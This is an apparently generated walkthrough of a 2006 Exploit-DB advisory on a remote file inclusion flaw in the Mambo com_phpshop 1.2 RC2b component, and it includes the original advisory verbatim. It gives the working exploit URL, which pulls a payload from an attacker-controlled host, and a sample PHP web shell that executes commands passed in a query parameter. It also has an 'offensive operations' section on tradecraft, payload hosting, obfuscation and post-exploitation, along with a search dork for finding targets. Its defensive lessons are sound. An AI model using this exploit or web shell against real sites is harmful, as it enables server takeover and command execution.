Understanding Mambo Component 'com_phpshop' Remote File Inclusion

What this paper is

This paper details a security vulnerability found in the Mambo Component 'com_phpshop' version 1.2 RC2b. The vulnerability is a Remote File Inclusion (RFI) flaw, allowing an attacker to include and execute arbitrary files from a remote server on the vulnerable web application.

Simple technical breakdown

The vulnerability exists in the toolbar.phpshop.html.php file within the com_phpshop component. This file, when processed by the web server, incorrectly handles a parameter named mosConfig_absolute_path. If this parameter is controlled by an attacker and points to a remote file (like a PHP script containing malicious code), the application will fetch and execute that remote file as if it were part of the local application. This is a classic Remote File Inclusion (RFI) vulnerability.

Complete code and payload walkthrough

The provided exploit is a URL, not a code file with shellcode in the traditional sense. It demonstrates how to trigger the RFI vulnerability.

Exploit URL:
http://www.targer.com/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt

Let's break down the components of this URL:

• http://www.targer.com/administrator/components/com_phpshop/toolbar.phpshop.html.php: This is the target URL pointing to the vulnerable file within the Mambo installation.
  • www.targer.com: The domain of the vulnerable Mambo website.
  • /administrator/components/com_phpshop/toolbar.phpshop.html.php: The specific path to the vulnerable script. This script is likely intended for administrative functions or displaying HTML-related content within the com_phpshop component.
• ?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt: This is the query string containing the malicious parameter.
  • mosConfig_absolute_path: This is the parameter name that the vulnerable script toolbar.phpshop.html.php is susceptible to. It's likely intended to specify an absolute path for configuration or file inclusion, but it's not properly sanitized.
  • http://Senjata.com/tembuspakeshell.txt: This is the value provided to the mosConfig_absolute_path parameter. It's a URL pointing to a remote file.
    • Senjata.com: The attacker-controlled server hosting the malicious file.
    • /tembuspakeshell.txt: The name of the malicious file. The .txt extension is often used to bypass simple file type filters, but if the web server is configured to interpret .txt files as PHP (or if the RFI mechanism forces interpretation), the content of this file will be executed.

How it works:

1. The attacker crafts the URL, specifying the vulnerable script and a remote file containing malicious PHP code.
2. The Mambo application receives the request.
3. The toolbar.phpshop.html.php script processes the mosConfig_absolute_path parameter.
4. Due to the lack of proper validation, the script attempts to include the file specified by mosConfig_absolute_path.
5. The web server fetches http://Senjata.com/tembuspakeshell.txt.
6. If the remote file contains valid PHP code and the server is configured to execute it (or the RFI mechanism forces execution), the PHP code from tembuspakeshell.txt will be executed on the target server.

Payload Segment:

The "payload" in this context is the content of the remote file tembuspakeshell.txt. While the paper doesn't explicitly show the content of tembuspakeshell.txt, a typical RFI payload would be a simple PHP script designed to achieve a specific goal, such as:

• Establishing a reverse shell: Connecting back to the attacker's machine.
• Executing arbitrary commands: Allowing the attacker to run commands on the server.
• Creating a web shell: Providing an interactive interface for the attacker to navigate the server and execute commands.

A common example for tembuspakeshell.txt could be:

<?php
// Simple command execution payload
echo "<h1>Hacked by Cmaster4</h1>";
system($_GET['cmd']);
?>

In this hypothetical payload:

• <?php ... ?>: Standard PHP opening and closing tags.
• echo "<h1>Hacked by Cmaster4</h1>";: A simple message to confirm execution.
• system($_GET['cmd']);: This is the core of the malicious functionality. It takes a command passed via the cmd GET parameter in the URL and executes it on the server.

Mapping:

• toolbar.phpshop.html.php: Vulnerable script that processes the mosConfig_absolute_path parameter.
• mosConfig_absolute_path: The vulnerable parameter allowing remote file inclusion.
• http://Senjata.com/tembuspakeshell.txt: The attacker-controlled remote file containing the payload.
• Content of tembuspakeshell.txt: The actual malicious code (e.g., PHP commands) to be executed.

Practical details for offensive operations teams

• Required Access Level: No elevated privileges are required on the target system. This is a remote vulnerability exploitable via HTTP requests.
• Lab Preconditions:
  • A vulnerable Mambo installation (version 1.2 RC2b) with the com_phpshop component installed.
  • A web server configured to allow PHP execution and potentially follow remote URLs (e.g., allow_url_fopen enabled in php.ini).
  • An attacker-controlled server (e.g., Senjata.com in the example) capable of hosting a malicious file and serving it over HTTP.
  • The malicious file (tembuspakeshell.txt) must contain executable PHP code.
• Tooling Assumptions:
  • A web browser for manual testing or crafting requests.
  • Tools like curl or wget for sending custom HTTP requests.
  • Automated vulnerability scanners might be configured to detect RFI.
  • A simple web server (e.g., Python's http.server, Apache, Nginx) to host the payload.
• Execution Pitfalls:
  • allow_url_fopen disabled: If allow_url_fopen is disabled in the target server's php.ini, the include or require functions (which RFI typically exploits) will not be able to fetch remote files.
  • File Extension Filtering: Some web applications or server configurations might filter based on file extensions. Using .txt is a common bypass, but if the server strictly enforces .php for execution, the payload might need to be hosted with a .php extension and the URL adjusted accordingly.
  • WAF/IPS: Web Application Firewalls or Intrusion Prevention Systems might detect the pattern of RFI attempts.
  • Incorrect URL/Path: The target URL or the path to the vulnerable script might be incorrect for a specific Mambo installation.
  • Payload Not Executable: The content of tembuspakeshell.txt might not be valid PHP, or the server might not be configured to execute files with that extension/content type.
  • mosConfig_absolute_path Not Used: The specific script toolbar.phpshop.html.php might have been patched or modified in a way that it no longer uses this parameter for inclusion.
• Tradecraft Considerations:
  • Reconnaissance: Identify Mambo installations and their versions. Look for the com_phpshop component.
  • Payload Hosting: Ensure the payload hosting server is stable and accessible from the target. Use a domain that doesn't immediately raise suspicion if possible.
  • Obfuscation: For more advanced attacks, payload obfuscation might be necessary to bypass basic signature detection.
  • Post-Exploitation: Once RFI is achieved, the immediate goal is usually to establish a more persistent or interactive shell.

Where this was used and when

This exploit was published in August 2006. Mambo was a popular Content Management System (CMS) around that time. Vulnerabilities like this were commonly found in web applications and components of that era. While specific instances of this exact exploit being used in the wild are not detailed in the paper, RFI vulnerabilities were widespread and frequently leveraged by attackers to compromise web servers.

Defensive lessons for modern teams

• Input Validation is Crucial: Never trust user-supplied input, especially when it's used in file paths or inclusion operations. Always validate and sanitize all external inputs.
• Disable allow_url_fopen and allow_url_include: For PHP applications, it's generally recommended to disable allow_url_fopen in php.ini to prevent file functions from accessing URLs. allow_url_include (if available) should also be disabled as it specifically allows include/require to use URLs.
• Keep Software Updated: Regularly update CMS platforms, components, and plugins to patch known vulnerabilities. Mambo itself was eventually succeeded by Joomla!, and older versions are highly susceptible.
• Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns like RFI.
• Secure Configuration: Ensure server configurations (like php.ini) are hardened and unnecessary features are disabled.
• Least Privilege: Run web applications with the minimum necessary privileges to limit the impact of a compromise.

ASCII visual (if applicable)

+-----------------+       +----------------------------------------------------+
| Attacker Server | ----> | Target Web Server (Mambo + com_phpshop)            |
| (e.g., Senjata.com)|       |                                                    |
| - tembuspakeshell.txt|       | - /administrator/components/com_phpshop/           |
| (PHP Payload)   |       |   toolbar.phpshop.html.php                         |
+-----------------+       +----------------------------------------------------+
        ^                                       |
        |                                       | Request with
        |                                       | mosConfig_absolute_path=
        |                                       | http://Senjata.com/tembuspakeshell.txt
        |                                       v
        +---------------------------------------+
                 Vulnerable Script Fetches and Executes Remote File

Source references

• PAPER ID: 2206
• PAPER TITLE: Mambo Component 'com_phpshop' 1.2 RC2b - Remote File Inclusion
• AUTHOR: Cmaster4
• PUBLISHED: 2006-08-17
• KEYWORDS: PHP,webapps
• PAPER URL: https://www.exploit-db.com/papers/2206
• RAW URL: https://www.exploit-db.com/raw/2206

Original Exploit-DB Content (Verbatim)

Affected Application: Mambo phpShop v1.2 RC2b

(Mambo CMS Component)


. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


Discoverd/Found by: Charles Nelwan a.k.a Cmaster4

Team: BatamHacker irc.dal.net crew

URL: http://www.batamhacker.info/forum

E-Mail: bugtraq_indo@yahoo.com



. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .


Typ: Remote [x] Local [ ]

Remote File Inclusion [x] SQL Injection [ ]

Level: Low [ ] Middle [x] High [ ]

Application: Mambo phpShop

Version: 1.2 RC2b

Vulnerable File: toolbar.phpshop.html.ph

URL: http://www.mambo-phpshop.net or http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=category&filecatid=1054

Description: phpShop component for Mambo. A fully featured shop component with IPN support, categories, userhandling, etc.

inurl:"com_phpshop"


. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


http://www.targer.com/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt



Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker 

# milw0rm.com [2006-08-17]